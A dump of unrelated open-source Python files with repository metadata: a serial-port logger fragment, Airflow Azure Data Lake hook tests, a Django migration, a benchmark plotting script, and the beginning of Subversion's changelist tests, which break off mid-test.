current_file.write(",".join(bauds))
current_file.write("\n")
current_file.write(",".join(xpars))
current_file.write("\n")
current_file.write(",".join(str(xbytes)))
current_file.write("\n")
current_file.write(",".join(str(eols)))
current_file.write("\n")
current_file.write(datapath)
current_file.write("\n")
# Setup the Serial ports for communication
ser = []
for i in range(nports):
current_file.write("Opening port " + ports[i] + "\n")
ser.append(serial.Serial())
ser[i].port = ports[i]
ser[i].baudrate = bauds[i]
ser[i].parity = xpars[i]
ser[i].bytesize = xbytes[i]
ser[i].open()
ser[i].flushInput()
ser[i].flushOutput()
current_file.write("Port " + ports[i] + " flushed\n")
# Close the settings file
settings_file.close()
# Close the LOG file for now
current_file.flush()
current_file.close()
# Start the logging
while True:
for i in range(nports):
print(ports[i])
try:
# Hacks to work with custom end of line
leneol = len(eols[i])
bline = bytearray()
# Get a line of data from the port
while True:
c = ser[i].read(1)
bline += c
if bline[-leneol:] == eols[i]:
break
## Parse the data line
line = bline.decode("utf-8").rstrip()
# Set the time for the record
rec_time=time.gmtime()
timestamp = time.strftime("%Y/%m/%d %H:%M:%S GMT",rec_time)
# Build the line to save to file
file_line = timestamp + "\t" + line
print(file_line)
# Save it to the appropriate file
current_file_name = datapath + prefixes[i] + time.strftime("_%Y%m%d.txt",rec_time)
current_file = open(current_file_name,"a")
current_file.write(file_line+"\n")
current_file.flush()
current_file.close()
file_line = ""
bline = bytearray()
        except Exception:
current_LOG_name = datapath + time.strftime("%Y%m%d.LOG", rec_time)
current_file = open(current_LOG_name, "a")
current_file.write(timestamp + " Unexpected error with port " + ports[i] + "\n")
current_file.write(timestamp + " No data recorded\n")
current_file.flush()
current_file.close()
print('I\'m done now')
avg_line_length: 33.693548 | max_line_length: 94 | alphanum_fraction: 0.628291

hexsha: 2a8c4604331efff38c7a000f0a3b3e3e75a42771 | size: 5,443 | ext: py | lang: Python
max_stars:  tests/providers/microsoft/azure/hooks/test_azure_data_lake.py | daemon-demon/airflow | 6f96e81f0123b30750fb68ec496246023bf63f35 | ["Apache-2.0"] | count: 2 | 2021-07-30T17:25:56.000Z | 2021-08-03T13:51:09.000Z
max_issues: tests/providers/microsoft/azure/hooks/test_azure_data_lake.py | daemon-demon/airflow | 6f96e81f0123b30750fb68ec496246023bf63f35 | ["Apache-2.0"] | count: 20 | 2021-01-23T12:33:08.000Z | 2021-12-07T22:30:37.000Z
max_forks:  tests/providers/microsoft/azure/hooks/test_azure_data_lake.py | daemon-demon/airflow | 6f96e81f0123b30750fb68ec496246023bf63f35 | ["Apache-2.0"] | count: 1 | 2020-11-04T03:12:47.000Z | 2020-11-04T03:12:47.000Z
content:
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
#
import json
import unittest
import mock
from airflow.models import Connection
from airflow.utils import db
class TestAzureDataLakeHook(unittest.TestCase):
def setUp(self):
db.merge_conn(
Connection(
conn_id='adl_test_key',
conn_type='azure_data_lake',
login='client_id',
password='client secret',
extra=json.dumps({"tenant": "tenant", "account_name": "accountname"}),
)
)
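    # Illustrative use of the hook under test (connection id as configured in setUp above;
    # file paths are hypothetical):
    #   hook = AzureDataLakeHook(azure_data_lake_conn_id='adl_test_key')
    #   hook.upload_file(local_path='data.csv', remote_path='/folder/data.csv')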
@mock.patch('airflow.providers.microsoft.azure.hooks.azure_data_lake.lib', autospec=True)
def test_conn(self, mock_lib):
from azure.datalake.store import core
from airflow.providers.microsoft.azure.hooks.azure_data_lake import AzureDataLakeHook
hook = AzureDataLakeHook(azure_data_lake_conn_id='adl_test_key')
self.assertIsNone(hook._conn)
self.assertEqual(hook.conn_id, 'adl_test_key')
self.assertIsInstance(hook.get_conn(), core.AzureDLFileSystem)
assert mock_lib.auth.called
@mock.patch(
'airflow.providers.microsoft.azure.hooks.azure_data_lake.core.AzureDLFileSystem', autospec=True
)
@mock.patch('airflow.providers.microsoft.azure.hooks.azure_data_lake.lib', autospec=True)
def test_check_for_blob(self, mock_lib, mock_filesystem):
from airflow.providers.microsoft.azure.hooks.azure_data_lake import AzureDataLakeHook
hook = AzureDataLakeHook(azure_data_lake_conn_id='adl_test_key')
hook.check_for_file('file_path')
        assert mock_filesystem.glob.called
@mock.patch(
'airflow.providers.microsoft.azure.hooks.azure_data_lake.multithread.ADLUploader', autospec=True
)
@mock.patch('airflow.providers.microsoft.azure.hooks.azure_data_lake.lib', autospec=True)
def test_upload_file(self, mock_lib, mock_uploader):
from airflow.providers.microsoft.azure.hooks.azure_data_lake import AzureDataLakeHook
hook = AzureDataLakeHook(azure_data_lake_conn_id='adl_test_key')
hook.upload_file(
local_path='tests/hooks/test_adl_hook.py',
remote_path='/test_adl_hook.py',
nthreads=64,
overwrite=True,
buffersize=4194304,
blocksize=4194304,
)
mock_uploader.assert_called_once_with(
hook.get_conn(),
lpath='tests/hooks/test_adl_hook.py',
rpath='/test_adl_hook.py',
nthreads=64,
overwrite=True,
buffersize=4194304,
blocksize=4194304,
)
@mock.patch(
'airflow.providers.microsoft.azure.hooks.azure_data_lake.multithread.ADLDownloader', autospec=True
)
@mock.patch('airflow.providers.microsoft.azure.hooks.azure_data_lake.lib', autospec=True)
def test_download_file(self, mock_lib, mock_downloader):
from airflow.providers.microsoft.azure.hooks.azure_data_lake import AzureDataLakeHook
hook = AzureDataLakeHook(azure_data_lake_conn_id='adl_test_key')
hook.download_file(
local_path='test_adl_hook.py',
remote_path='/test_adl_hook.py',
nthreads=64,
overwrite=True,
buffersize=4194304,
blocksize=4194304,
)
mock_downloader.assert_called_once_with(
hook.get_conn(),
lpath='test_adl_hook.py',
rpath='/test_adl_hook.py',
nthreads=64,
overwrite=True,
buffersize=4194304,
blocksize=4194304,
)
@mock.patch(
'airflow.providers.microsoft.azure.hooks.azure_data_lake.core.AzureDLFileSystem', autospec=True
)
@mock.patch('airflow.providers.microsoft.azure.hooks.azure_data_lake.lib', autospec=True)
def test_list_glob(self, mock_lib, mock_fs):
from airflow.providers.microsoft.azure.hooks.azure_data_lake import AzureDataLakeHook
hook = AzureDataLakeHook(azure_data_lake_conn_id='adl_test_key')
hook.list('file_path/*')
mock_fs.return_value.glob.assert_called_once_with('file_path/*')
@mock.patch(
'airflow.providers.microsoft.azure.hooks.azure_data_lake.core.AzureDLFileSystem', autospec=True
)
@mock.patch('airflow.providers.microsoft.azure.hooks.azure_data_lake.lib', autospec=True)
def test_list_walk(self, mock_lib, mock_fs):
from airflow.providers.microsoft.azure.hooks.azure_data_lake import AzureDataLakeHook
hook = AzureDataLakeHook(azure_data_lake_conn_id='adl_test_key')
hook.list('file_path/some_folder/')
mock_fs.return_value.walk.assert_called_once_with('file_path/some_folder/')
avg_line_length: 40.022059 | max_line_length: 106 | alphanum_fraction: 0.696123

hexsha: 265122ffd7474530f49422c264a7440796388af8 | size: 2,636 | ext: py | lang: Python
max_stars:  appengine/src/greenday_core/migrations/0016_auto_20150521_1325.py | meedan/montage | 4da0116931edc9af91f226876330645837dc9bcc | ["Apache-2.0"] | count: 6 | 2018-07-31T16:48:07.000Z | 2020-02-01T03:17:51.000Z
max_issues: appengine/src/greenday_core/migrations/0016_auto_20150521_1325.py | meedan/montage | 4da0116931edc9af91f226876330645837dc9bcc | ["Apache-2.0"] | count: 41 | 2018-08-07T16:43:07.000Z | 2020-06-05T18:54:50.000Z
max_forks:  appengine/src/greenday_core/migrations/0016_auto_20150521_1325.py | meedan/montage | 4da0116931edc9af91f226876330645837dc9bcc | ["Apache-2.0"] | count: 1 | 2018-08-07T16:40:18.000Z | 2018-08-07T16:40:18.000Z
content:
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
dependencies = [
('greenday_core', '0015_auto_20150422_1624'),
]
operations = [
migrations.AlterField(
model_name='event',
name='event_kind',
field=models.IntegerField(),
),
migrations.AlterField(
model_name='event',
name='kind',
field=models.IntegerField(verbose_name=((0, b'PROJECTCREATED'), (1, b'PROJECTUPDATED'), (2, b'PROJECTDELETED'), (50, b'PROJECTRESTORED'), (100, b'VIDEOCREATED'), (101, b'VIDEOUPDATED'), (102, b'VIDEODELETED'), (150, b'VIDEOHIGHLIGHTED'), (151, b'VIDEOUNHIGHLIGHTED'), (152, b'VIDEOARCHIVED'), (153, b'VIDEOUNARCHIVED'), (200, b'USERCREATED'), (201, b'USERUPDATED'), (202, b'USERDELETED'), (250, b'USERACCEPTEDNDA'), (251, b'USERINVITEDASPROJECTUSER'), (252, b'PENDINGUSERREMOVED'), (253, b'USERACCEPTEDPROJECTINVITE'), (254, b'USERREJECTEDPROJECTINVITE'), (255, b'USERREMOVED'), (256, b'PROJECTCOLLABORATORONLINE'), (257, b'PROJECTCOLLABORATOROFFLINE'), (300, b'VIDEOCOLLECTIONCREATED'), (301, b'VIDEOCOLLECTIONUPDATED'), (302, b'VIDEOCOLLECTIONDELETED'), (350, b'VIDEOADDEDTOCOLLECTION'), (351, b'VIDEOREMOVEDFROMCOLLECTION'), (450, b'PENDINGUSERINVITEDASPROJECTADMIN'), (451, b'PENDINGUSERINVITEDASPROJECTUSER'), (500, b'PROJECTROOTCOMMENTCREATED'), (501, b'PROJECTCOMMENTUPDATED'), (502, b'PROJECTCOMMENTDELETED'), (600, b'TIMEDVIDEOROOTCOMMENTCREATED'), (601, b'TIMEDVIDEOCOMMENTUPDATED'), (602, b'TIMEDVIDEOCOMMENTDELETED'), (700, b'TIMEDVIDEOREPLYCOMMENTCREATED'), (701, b'TIMEDVIDEOREPLYCOMMENTUPDATED'), (702, b'TIMEDVIDEOREPLYCOMMENTDELETED'), (800, b'PROJECTREPLYCOMMENTCREATED'), (801, b'PROJECTREPLYCOMMENTUPDATED'), (802, b'PROJECTREPLYCOMMENTDELETED'))),
),
migrations.AlterField(
model_name='event',
name='object_id',
field=models.IntegerField(null=True),
),
migrations.AlterField(
model_name='event',
name='object_kind',
field=models.IntegerField(),
),
migrations.AlterField(
model_name='event',
name='project_id',
field=models.IntegerField(null=True),
),
migrations.AlterField(
model_name='event',
name='timestamp',
field=models.DateTimeField(),
),
migrations.AlterField(
model_name='event',
name='video_id',
field=models.IntegerField(null=True),
),
]
avg_line_length: 52.72 | max_line_length: 1,380 | alphanum_fraction: 0.645675

hexsha: 8186927b1589218c705bdeb37f5bb1df710b4840 | size: 6,371 | ext: py | lang: Python
max_stars:  plot.py | jazzsewera/aisde-lab2 | 072c8cddeefa4115a946a6915bd1d1a60f4b52ca | ["MIT"] | count: null | null | null
max_issues: plot.py | jazzsewera/aisde-lab2 | 072c8cddeefa4115a946a6915bd1d1a60f4b52ca | ["MIT"] | count: null | null | null
max_forks:  plot.py | jazzsewera/aisde-lab2 | 072c8cddeefa4115a946a6915bd1d1a60f4b52ca | ["MIT"] | count: null | null | null
content:
import numpy as np
from scipy.stats import linregress
import sys
import getopt
import json
import re
try:
from matplotlib import pyplot as plt
except Exception:
import matplotlib
matplotlib.use('pdf')
from matplotlib import pyplot as plt
def save_plot(alg_name, file_suffix, y_label, legend_list, title_prefix,
is_log=False, axes=None):
plt.title(title_prefix + ' for {0} algorithm'.format(
re.sub(r'\_',
' ',
alg_name)
)
)
plt.legend(legend_list, loc='upper left')
if is_log:
plt.xlabel('Log of no. of elements')
axes.get_legend().remove()
else:
plt.xlabel('No. of elements in array')
plt.ylabel(y_label)
plt.grid()
plt.ticklabel_format(axis='both',
style='sci',
scilimits=(-3, 3),
useOffset=False)
plt.savefig('out/pdf/' + alg_name + '_' + file_suffix + '.pdf')
def plot_log(execution_time_array, data_array_size,
alg_name):
'''Log plot of exec time
Not very universal, you may have to tweak
some numbers'''
data_big_val = data_array_size
if 0 not in execution_time_array:
exec_time_log_arr = np.log2(execution_time_array)
data_big_val_log = np.log2(data_big_val)
else:
print('Some of the values in exec_time are 0')
print('and logarithm of 0 is minus infinity.')
print('Discarding those values for this plot')
        exec_time_arr = [x for x in execution_time_array if x != 0]
exec_time_log_arr = np.log2(exec_time_arr)
arr_start = len(data_big_val) - len(exec_time_arr)
data_big_val_log = np.log2(data_big_val[arr_start:])
slope, _, _, _, err = linregress(data_big_val_log, exec_time_log_arr)
# print(slope)
# print(err)
ax = plt.axes()
plt.plot(
data_big_val_log, exec_time_log_arr, 'o-'
)
plt.text(0.5, 0.15, # position of the text relative to axes
' Linregress:\nslope = {0}\n err = {1}'.format(
np.around(slope, 5), np.around(err, 5)
),
horizontalalignment='left',
verticalalignment='baseline',
transform=ax.transAxes,
fontdict=dict(
family='monospace',
color='darkred',
weight='bold',
size=12)
)
save_plot(alg_name, 'exec_log_log', 'Log of exec time',
[''],
'Log of exec time',
is_log=True,
axes=ax)
plt.clf()
def plot_standard(argv, do_plot_log=False):
try:
with open(str(argv[0])) as input_file:
data = json.load(input_file)
with open(str(argv[1])) as input_array_size_file:
data_array_size = json.load(input_array_size_file)
except Exception:
        print('Usage: python plot.py [-l] <input_file> '
              '<input_array_size_file>')
        print('\tfor regular plotting, -l option for '
              'plotting log (you will need to tweak numbers in source file)')
print('python plot.py -c <input_file0>,...'
' -n <input_array_size_file>')
print('\tfor comparisons')
print('Make sure you have valid json files')
quit()
file_name = re.sub('out/', '', str(argv[0]))
alg_name = re.sub('.json', '', file_name)
'''Execution time plot'''
execution_time_array = [data_elem['execution_time']
for data_elem in data]
plt.plot(data_array_size, execution_time_array, 'o-')
save_plot(alg_name, 'exec_time', 'Execution time [s]',
['Execution time'],
'Time complexity')
plt.clf()
'''No of operations total plot'''
com_arr_alg = [elem['algorithm']['comparisons'] for elem in data]
swps_arr_alg = [elem['algorithm']['swaps'] for elem in data]
com_arr_imp = [elem['implementation']['comparisons'] for elem in data]
add_arr_imp = [elem['implementation']['additions'] for elem in data]
plt.plot(
data_array_size, com_arr_alg, 'o-',
data_array_size, swps_arr_alg, 'o-',
data_array_size, com_arr_imp, 'o-',
data_array_size, add_arr_imp, 'o-'
)
legends = [
'Comparisons (algorithm)',
'Swaps (algorithm)',
'Comparisons (implementation)',
'Additions (implementation)'
]
save_plot(alg_name, 'oper_count', 'No. of operations', legends,
'No. of total operations')
plt.clf()
if do_plot_log:
plot_log(execution_time_array, data_array_size, alg_name)
def plot_compare(opts, args):
data_comp = []
legends = []
for opt, arg in opts:
if opt == '-c':
for file in arg.split(','):
with open(file) as in_file:
data_comp.append(json.load(in_file))
legends.append(re.sub(r'_', ' ',
re.sub('.json', '',
re.sub('out/', '', file)
)
)
)
elif opt == '-n':
with open(arg) as in_file:
data_comp_arr_size = json.load(in_file)
for data in data_comp:
execution_time_array = [data_elem['execution_time']
for data_elem in data]
plt.plot(data_comp_arr_size, execution_time_array, 'o-')
save_plot('all', 'comparison', 'Time of execution [s]',
legends, 'Time of execution')
def main(argv):
std_mode = True
try:
opts, args = getopt.getopt(argv, 'c:n:l')
except getopt.GetoptError:
exit()
for opt, arg in opts:
if opt == '-c':
std_mode = False
plot_compare(opts, args)
if opt == '-l':
std_mode = False
plot_standard(argv[1:], True)
if std_mode:
plot_standard(argv)
if __name__ == '__main__':
main(sys.argv[1:])
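# Example invocations (illustrative file names):
#   python plot.py out/bubble_sort.json out/array_sizes.json
#   python plot.py -l out/bubble_sort.json out/array_sizes.json
#   python plot.py -c out/bubble_sort.json,out/merge_sort.json -n out/array_sizes.json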
avg_line_length: 34.252688 | max_line_length: 77 | alphanum_fraction: 0.533511

hexsha: 4652acc7aabe49121906ffaf28dd20a60123253d | size: 47,549 | ext: py | lang: Python
max_stars:  subversion/tests/cmdline/changelist_tests.py | ruchirarya/svn | 81502a213251c2af21361a942bd9a8cd7d3adb9f | ["Apache-2.0"] | count: 7 | 2018-01-18T06:13:21.000Z | 2020-07-09T03:46:16.000Z
max_issues: depe/subversion/subversion/tests/cmdline/changelist_tests.py | louis-tru/TouchCode2 | 91c182aeaa37fba16e381ea749d32906dab1aeea | ["BSD-3-Clause-Clear"] | count: 4 | 2015-01-12T22:23:41.000Z | 2015-01-12T22:33:52.000Z
max_forks:  src/subversion/subversion/tests/cmdline/changelist_tests.py | schwern/alien-svn | 7423b08f9bc4fdf0ac0d7ea53495269b21b3e8f9 | ["Apache-2.0"] | count: 1 | 2020-11-04T07:25:22.000Z | 2020-11-04T07:25:22.000Z
content:
#!/usr/bin/env python
#
# changelist_tests.py: testing changelist uses.
#
# Subversion is a tool for revision control.
# See http://subversion.apache.org for more information.
#
# ====================================================================
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
######################################################################
# General modules
import string, sys, os, re
# Our testing module
import svntest
# (abbreviation)
Skip = svntest.testcase.Skip_deco
SkipUnless = svntest.testcase.SkipUnless_deco
XFail = svntest.testcase.XFail_deco
Issues = svntest.testcase.Issues_deco
Issue = svntest.testcase.Issue_deco
Wimp = svntest.testcase.Wimp_deco
Item = svntest.wc.StateItem
######################################################################
# Utilities
def mod_all_files(wc_dir, new_text):
"""Walk over working copy WC_DIR, appending NEW_TEXT to all the
files in that tree (but not inside the .svn areas of that tree)."""
dot_svn = svntest.main.get_admin_name()
for dirpath, dirs, files in os.walk(wc_dir):
if dot_svn in dirs:
dirs.remove(dot_svn)
for name in files:
svntest.main.file_append(os.path.join(dirpath, name), new_text)
def changelist_all_files(wc_dir, name_func):
"""Walk over working copy WC_DIR, adding versioned files to
changelists named by invoking NAME_FUNC(full-path-of-file) and
noting its string return value (or None, if we wish to remove the
file from a changelist)."""
dot_svn = svntest.main.get_admin_name()
for dirpath, dirs, files in os.walk(wc_dir):
if dot_svn in dirs:
dirs.remove(dot_svn)
for name in files:
full_path = os.path.join(dirpath, name)
clname = name_func(full_path)
if not clname:
svntest.main.run_svn(None, "changelist", "--remove", full_path)
else:
svntest.main.run_svn(None, "changelist", clname, full_path)
def clname_from_lastchar_cb(full_path):
"""Callback for changelist_all_files() that returns a changelist
name matching the last character in the file's name. For example,
after running this on a greek tree where every file has some text
modification, 'svn status' shows:
--- Changelist 'a':
M A/B/lambda
M A/B/E/alpha
M A/B/E/beta
M A/D/gamma
M A/D/H/omega
M iota
--- Changelist 'u':
M A/mu
M A/D/G/tau
--- Changelist 'i':
M A/D/G/pi
M A/D/H/chi
M A/D/H/psi
--- Changelist 'o':
M A/D/G/rho
"""
return full_path[-1]
# Regular expressions for 'svn changelist' output.
_re_cl_rem_pattern = "^D \[(.*)\] (.*)"
_re_cl_skip = re.compile("Skipped '(.*)'")
_re_cl_add = re.compile("^A \[(.*)\] (.*)")
_re_cl_rem = re.compile(_re_cl_rem_pattern)
def verify_changelist_output(output, expected_adds=None,
expected_removals=None,
expected_skips=None):
"""Compare lines of OUTPUT from 'svn changelist' against
EXPECTED_ADDS (a dictionary mapping paths to changelist names),
EXPECTED_REMOVALS (a dictionary mapping paths to ... whatever), and
EXPECTED_SKIPS (a dictionary mapping paths to ... whatever).
EXPECTED_SKIPS is ignored if None."""
num_expected = 0
if expected_adds:
num_expected += len(expected_adds)
if expected_removals:
num_expected += len(expected_removals)
if expected_skips:
num_expected += len(expected_skips)
if not expected_skips:
output = [line for line in output if (not _re_cl_skip.match(line))]
for line in output:
line = line.rstrip()
match = _re_cl_rem.match(line)
if match \
and expected_removals \
and match.group(2) in expected_removals:
continue
elif match:
raise svntest.Failure("Unexpected changelist removal line: " + line)
match = _re_cl_add.match(line)
if match \
and expected_adds \
and expected_adds.get(match.group(2)) == match.group(1):
continue
elif match:
raise svntest.Failure("Unexpected changelist add line: " + line)
match = _re_cl_skip.match(line)
if match \
and expected_skips \
       and match.group(1) in expected_skips:
continue
elif match:
raise svntest.Failure("Unexpected changelist skip line: " + line)
raise svntest.Failure("Unexpected line: " + line)
if len(output) != num_expected:
raise svntest.Failure("Unexpected number of 'svn changelist' output " +
"lines (%d vs %d)" % (len(output), num_expected))
def verify_pget_output(output, expected_props):
"""Compare lines of OUTPUT from 'svn propget' against EXPECTED_PROPS
(a dictionary mapping paths to property values)."""
_re_pget = re.compile('^(.*) - (.*)$')
actual_props = {}
for line in output:
try:
path, prop = line.rstrip().split(' - ')
except:
raise svntest.Failure("Unexpected output line: " + line)
actual_props[path] = prop
if expected_props != actual_props:
raise svntest.Failure("Got unexpected property results\n"
"\tExpected: %s\n"
"\tActual: %s" % (str(expected_props),
str(actual_props)))
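# For example, an illustrative 'svn propget' output line such as "A/mu - bar" (path, property
# value) is parsed above into {'A/mu': 'bar'} before being compared against EXPECTED_PROPS.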
######################################################################
# Tests
#
# Each test must return on success or raise on failure.
#----------------------------------------------------------------------
def add_remove_changelists(sbox):
"add and remove files from changelists"
sbox.build()
wc_dir = sbox.wc_dir
### 'Skip' notifications
def expected_skips_under(*greek_path):
"return a dict mapping Greek-tree directories below GREEK_PATH to None"
expected_skips = {}
for path in expected_skips_all:
if path.startswith(os.path.join(wc_dir, *greek_path)):
expected_skips[path] = None
return expected_skips
def all_parents(expected_adds):
"""return a dict mapping Greek-tree directories above directories in
EXPECTED_ADDS to None"""
expected_skips = {}
for path in expected_adds.keys():
if not os.path.isdir(path):
path = os.path.dirname(path)
while path != wc_dir:
expected_skips[path] = None
path = os.path.dirname(path)
expected_skips[wc_dir] = None
return expected_skips
# all dirs in the Greek tree
expected_skips_all = dict([(x, None) for x in [
sbox.ospath(''),
sbox.ospath('A'),
sbox.ospath('A/B'),
sbox.ospath('A/B/E'),
sbox.ospath('A/B/F'),
sbox.ospath('A/C'),
sbox.ospath('A/D'),
sbox.ospath('A/D/G'),
sbox.ospath('A/D/H'),
]])
expected_skips_wc_dir = { wc_dir : None }
### First, we play with just adding to changelists ###
# svn changelist foo WC_DIR
exit_code, output, errput = svntest.main.run_svn(None, "changelist", "foo",
wc_dir)
verify_changelist_output(output) # nothing expected
# svn changelist foo WC_DIR --depth files
exit_code, output, errput = svntest.main.run_svn(None, "changelist", "foo",
"--depth", "files",
wc_dir)
expected_adds = {
os.path.join(wc_dir, 'iota') : 'foo',
}
verify_changelist_output(output, expected_adds)
# svn changelist foo WC_DIR --depth infinity
exit_code, output, errput = svntest.main.run_svn(None, "changelist", "foo",
"--depth", "infinity",
wc_dir)
expected_adds = {
sbox.ospath('A/B/E/alpha') : 'foo',
sbox.ospath('A/B/E/beta') : 'foo',
sbox.ospath('A/B/lambda') : 'foo',
sbox.ospath('A/D/G/pi') : 'foo',
sbox.ospath('A/D/G/rho') : 'foo',
sbox.ospath('A/D/G/tau') : 'foo',
sbox.ospath('A/D/H/chi') : 'foo',
sbox.ospath('A/D/H/omega') : 'foo',
sbox.ospath('A/D/H/psi') : 'foo',
sbox.ospath('A/D/gamma') : 'foo',
sbox.ospath('A/mu') : 'foo',
}
verify_changelist_output(output, expected_adds)
### Now, change some changelists ###
# svn changelist bar WC_DIR/A/D --depth infinity
exit_code, output, errput = svntest.main.run_svn(".*", "changelist", "bar",
"--depth", "infinity",
sbox.ospath('A/D'))
expected_adds = {
sbox.ospath('A/D/G/pi') : 'bar',
sbox.ospath('A/D/G/rho') : 'bar',
sbox.ospath('A/D/G/tau') : 'bar',
sbox.ospath('A/D/H/chi') : 'bar',
sbox.ospath('A/D/H/omega') : 'bar',
sbox.ospath('A/D/H/psi') : 'bar',
sbox.ospath('A/D/gamma') : 'bar',
}
expected_removals = expected_adds
verify_changelist_output(output, expected_adds, expected_removals)
# svn changelist baz WC_DIR/A/D/H --depth infinity
exit_code, output, errput = svntest.main.run_svn(".*", "changelist", "baz",
"--depth", "infinity",
sbox.ospath('A/D/H'))
expected_adds = {
sbox.ospath('A/D/H/chi') : 'baz',
sbox.ospath('A/D/H/omega') : 'baz',
sbox.ospath('A/D/H/psi') : 'baz',
}
expected_removals = expected_adds
verify_changelist_output(output, expected_adds, expected_removals)
### Now, let's selectively rename some changelists ###
# svn changelist foo-rename WC_DIR --depth infinity --changelist foo
exit_code, output, errput = svntest.main.run_svn(".*", "changelist",
"foo-rename",
"--depth", "infinity",
"--changelist", "foo",
wc_dir)
expected_adds = {
sbox.ospath('A/B/E/alpha') : 'foo-rename',
sbox.ospath('A/B/E/beta') : 'foo-rename',
sbox.ospath('A/B/lambda') : 'foo-rename',
sbox.ospath('A/mu') : 'foo-rename',
sbox.ospath('iota') : 'foo-rename',
}
expected_removals = expected_adds
verify_changelist_output(output, expected_adds, expected_removals)
# svn changelist bar WC_DIR --depth infinity
# --changelist foo-rename --changelist baz
exit_code, output, errput = svntest.main.run_svn(
".*", "changelist", "bar", "--depth", "infinity",
"--changelist", "foo-rename", "--changelist", "baz", wc_dir)
expected_adds = {
sbox.ospath('A/B/E/alpha') : 'bar',
sbox.ospath('A/B/E/beta') : 'bar',
sbox.ospath('A/B/lambda') : 'bar',
sbox.ospath('A/D/H/chi') : 'bar',
sbox.ospath('A/D/H/omega') : 'bar',
sbox.ospath('A/D/H/psi') : 'bar',
sbox.ospath('A/mu') : 'bar',
sbox.ospath('iota') : 'bar',
}
expected_removals = expected_adds
verify_changelist_output(output, expected_adds, expected_removals)
### Okay. Time to remove some stuff from changelists now. ###
# svn changelist --remove WC_DIR
exit_code, output, errput = svntest.main.run_svn(None, "changelist",
"--remove", wc_dir)
verify_changelist_output(output) # nothing expected
# svn changelist --remove WC_DIR --depth files
exit_code, output, errput = svntest.main.run_svn(None, "changelist",
"--remove",
"--depth", "files",
wc_dir)
expected_removals = {
os.path.join(wc_dir, 'iota') : None,
}
verify_changelist_output(output, None, expected_removals)
# svn changelist --remove WC_DIR --depth infinity
exit_code, output, errput = svntest.main.run_svn(None, "changelist",
"--remove",
"--depth", "infinity",
wc_dir)
expected_removals = {
sbox.ospath('A/B/E/alpha') : None,
sbox.ospath('A/B/E/beta') : None,
sbox.ospath('A/B/lambda') : None,
sbox.ospath('A/D/G/pi') : None,
sbox.ospath('A/D/G/rho') : None,
sbox.ospath('A/D/G/tau') : None,
sbox.ospath('A/D/H/chi') : None,
sbox.ospath('A/D/H/omega') : None,
sbox.ospath('A/D/H/psi') : None,
sbox.ospath('A/D/gamma') : None,
sbox.ospath('A/mu') : None,
}
verify_changelist_output(output, None, expected_removals)
### Add files to changelists based on the last character in their names ###
changelist_all_files(wc_dir, clname_from_lastchar_cb)
### Now, do selective changelist removal ###
# svn changelist --remove WC_DIR --depth infinity --changelist a
exit_code, output, errput = svntest.main.run_svn(None, "changelist",
"--remove",
"--depth", "infinity",
"--changelist", "a",
wc_dir)
expected_removals = {
sbox.ospath('A/B/E/alpha') : None,
sbox.ospath('A/B/E/beta') : None,
sbox.ospath('A/B/lambda') : None,
sbox.ospath('A/D/H/omega') : None,
sbox.ospath('A/D/gamma') : None,
sbox.ospath('iota') : None,
}
verify_changelist_output(output, None, expected_removals)
# svn changelist --remove WC_DIR --depth infinity
# --changelist i --changelist o
exit_code, output, errput = svntest.main.run_svn(None, "changelist",
"--remove",
"--depth", "infinity",
"--changelist", "i",
"--changelist", "o",
wc_dir)
expected_removals = {
sbox.ospath('A/D/G/pi') : None,
sbox.ospath('A/D/G/rho') : None,
sbox.ospath('A/D/H/chi') : None,
sbox.ospath('A/D/H/psi') : None,
}
verify_changelist_output(output, None, expected_removals)
#----------------------------------------------------------------------
def commit_one_changelist(sbox):
"commit with single --changelist"
sbox.build()
wc_dir = sbox.wc_dir
# Add a line of text to all the versioned files in the tree.
mod_all_files(wc_dir, "New text.\n")
# Add files to changelists based on the last character in their names.
changelist_all_files(wc_dir, clname_from_lastchar_cb)
# Now, test a commit that uses a single changelist filter (--changelist a).
expected_output = svntest.wc.State(wc_dir, {
'A/B/lambda' : Item(verb='Sending'),
'A/B/E/alpha' : Item(verb='Sending'),
'A/B/E/beta' : Item(verb='Sending'),
'A/D/gamma' : Item(verb='Sending'),
'A/D/H/omega' : Item(verb='Sending'),
'iota' : Item(verb='Sending'),
})
expected_status = svntest.actions.get_virginal_state(wc_dir, 1)
expected_status.tweak('A/mu', 'A/D/G/tau', 'A/D/G/pi', 'A/D/H/chi',
'A/D/H/psi', 'A/D/G/rho', wc_rev=1, status='M ')
expected_status.tweak('iota', 'A/B/lambda', 'A/B/E/alpha', 'A/B/E/beta',
'A/D/gamma', 'A/D/H/omega', wc_rev=2, status=' ')
svntest.actions.run_and_verify_commit(wc_dir,
expected_output,
expected_status,
None,
wc_dir,
"--changelist",
"a")
#----------------------------------------------------------------------
def commit_multiple_changelists(sbox):
"commit with multiple --changelist's"
sbox.build()
wc_dir = sbox.wc_dir
# Add a line of text to all the versioned files in the tree.
mod_all_files(wc_dir, "New text.\n")
# Add files to changelists based on the last character in their names.
changelist_all_files(wc_dir, clname_from_lastchar_cb)
# Now, test a commit that uses multiple changelist filters
# (--changelist=a --changelist=i).
expected_output = svntest.wc.State(wc_dir, {
'A/B/lambda' : Item(verb='Sending'),
'A/B/E/alpha' : Item(verb='Sending'),
'A/B/E/beta' : Item(verb='Sending'),
'A/D/gamma' : Item(verb='Sending'),
'A/D/H/omega' : Item(verb='Sending'),
'iota' : Item(verb='Sending'),
'A/D/G/pi' : Item(verb='Sending'),
